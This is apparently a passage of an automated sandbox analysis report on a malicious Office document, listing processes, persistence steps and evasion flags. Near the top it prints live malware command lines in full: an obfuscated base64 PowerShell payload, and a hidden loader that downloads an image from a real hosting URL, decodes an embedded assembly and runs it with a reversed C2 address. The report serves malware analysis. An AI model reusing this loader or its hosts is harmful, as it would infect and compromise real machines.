              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"Jump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000E9247 RtlDeleteCriticalSection,RtlDeleteCriticalSection,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,18_2_000E9247
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_002F5893 push ebx; iretd 8_2_002F5894
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_002FF7C1 push edi; iretd 8_2_002FF7C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040134A pushfd ; retf 13_2_00401353
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004012F2 pushfd ; retf 13_2_004012F3
              Source: C:\Windows\explorer.exeCode function: 19_2_0006A055 push es; iretd 19_2_0006A05D
              Source: C:\Windows\explorer.exeCode function: 19_2_00061405 push esi; ret 19_2_00061407
              Source: C:\Windows\explorer.exeCode function: 19_2_000647A7 push esp; iretd 19_2_000647A8
              Source: C:\Windows\explorer.exeCode function: 19_2_000614D4 push esi; ret 19_2_000614D6
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000838A7 push esp; iretd 21_2_000838A8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008967E push ds; retf 21_2_00089680
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000894E6 push edx; ret 21_2_000894E7
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000887CE push es; ret 22_2_00088A18
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00088EEF push edi; ret 22_2_00088EF0
              Source: C:\Windows\explorer.exeCode function: 23_2_000E1405 push esi; ret 23_2_000E1407
              Source: C:\Windows\explorer.exeCode function: 23_2_000E14D4 push esi; ret 23_2_000E14D6
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00083417 push esp; iretd 24_2_00083418
              Source: C:\Windows\explorer.exeCode function: 25_2_000E1405 push esi; ret 25_2_000E1407
              Source: C:\Windows\explorer.exeCode function: 25_2_000E45A7 push esp; iretd 25_2_000E45A8
              Source: C:\Windows\explorer.exeCode function: 25_2_000E14D4 push esi; ret 25_2_000E14D6
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 28_2_000C3627 push esp; iretd 28_2_000C3628
              Source: C:\Windows\explorer.exeCode function: 29_2_0006AC8D push esp; iretd 29_2_0006AC95
              Source: C:\Windows\explorer.exeCode function: 29_2_0006AAD2 push ebp; iretd 29_2_0006AAD3
              Source: C:\Windows\explorer.exeCode function: 29_2_00061405 push esi; ret 29_2_00061407
              Source: C:\Windows\explorer.exeCode function: 29_2_000614D4 push esi; ret 29_2_000614D6

              Persistence and Installation Behavior

              barindex
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\z2.ink\DavWWWRootJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rugtucwJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rugtucwJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rugtucw:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
              Source: C:\Windows\SysWOW64\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
